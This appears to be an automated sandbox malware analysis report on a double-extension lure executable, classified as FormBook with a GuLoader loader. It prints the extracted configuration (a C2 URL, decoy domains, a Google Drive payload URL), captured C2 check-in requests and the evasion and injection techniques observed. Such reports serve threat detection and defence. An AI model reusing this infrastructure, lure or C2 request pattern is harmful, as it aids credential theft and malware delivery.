Windows Analysis Report Arrival Notice, CIA Awb Inv Form.pdf.exe

Overview

General Information

Sample Name: Arrival Notice, CIA Awb Inv Form.pdf.exe
Analysis ID: 527894
MD5: ff71941571d8930c1125b3931d400d86
SHA1: 0a417bf568a5978777021e433bf4693893facd3e
SHA256: bf952f1cd44de7bf63c63e502670d3a6a97eca1b5f7fd9981ed0d235351e975f
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.papllc.biz/s3f1/"], "decoy": ["teslaislandbois.com", "teslafreesuperchargermiles.com", "wifibudddy.sbs", "spmr.tv", "rossatospa.com", "crypto-cardano.com", "mvsteals.com", "amazonsellwithdiscount.com", "safety1-venture.us", "hara.cloud", "musee-radix-hairsalon.com", "celsb.com", "leaureveedhubert.com", "bncmobile.com", "bptrix.xyz", "wawadecoration.com", "redirect-amazones.com", "baseballinformatics.com", "predator.rest", "heinzelmaennchenltd.net", "metafacebookmessenger.com", "izivente.com", "evaccines.com", "alexacoyne.com", "emansdesign.com", "donefirsr.com", "ramel.us", "homie-hairsalon.com", "renatotomatis.com", "thecryptofirm.us", "4mtechmachines.com", "thaicharuen.com", "alexanderferency.com", "facebook-meta-morphosis.com", "spaziofellowes.com", "eggchanceapple.top", "trust2-profit.us", "investmenofpairs.club", "a.town", "soarlikeaneagle.site", "itssscraftingxo.com", "721369.online", "cornershopgoodwill.com", "programagubernamental.xyz", "siluca.biz", "rivianhawaii.com", "c2sh32.com", "meta-facebook.net", "amazonasmidia.com", "tmjuber.com", "venomous.kr", "stratosbuilder.com", "unitedlegalsolutions.us", "qivem.top", "federal-funds-deposit.com", "morningstarapparel.space", "verlag.us", "wwwdonefirst.com", "meta-morphosisfacebook.com", "mvrsfacebook.ca", "founditonamazon.net", "shellyperkowski.com", "firstsolar-s.com", "viiew.co"]}
Source: 00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=16igyruBe"}
Multi AV Scanner detection for submitted file
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Virustotal: Detection: 37% Perma Link
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match File source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

Compliance:

barindex
Uses 32bit PE files
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49806 version: TLS 1.2
Source: Binary string: netstat.pdbGCTL source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
Source: Binary string: netstat.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop esi 8_2_0281731A

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 154.94.229.8 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 107.178.157.225 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.198.112.85 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 70.40.220.123 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 183.181.99.12 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 184.168.98.97 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 64.190.62.111 80 Jump to behavior
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=16igyruBe
Source: Malware configuration extractor URLs: www.papllc.biz/s3f1/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.izivente.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.musee-radix-hairsalon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.teslafreesuperchargermiles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.mvsteals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.thaicharuen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.morningstarapparel.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.soarlikeaneagle.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.evaccines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.celsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1Host: www.4mtechmachines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1Host: www.hara.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 64.190.62.111 64.190.62.111
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-5s-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:09:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "6197bde3-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:10:33 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be74a-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Nov 2021 14:12:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:14:34 GMTContent-Type: text/htmlContent-Length: 275ETag: "61951b77-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 00000007.00000000.22755704421.000000000D59B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22655480693.000000000D59B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22985193767.000000000D59B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe String found in binary or memory: http://s.symcd.com06
Source: explorer.exe, 00000007.00000000.22975794820.000000000A7C0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22635050466.0000000002FB0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22646529192.0000000009AB0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.micro
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
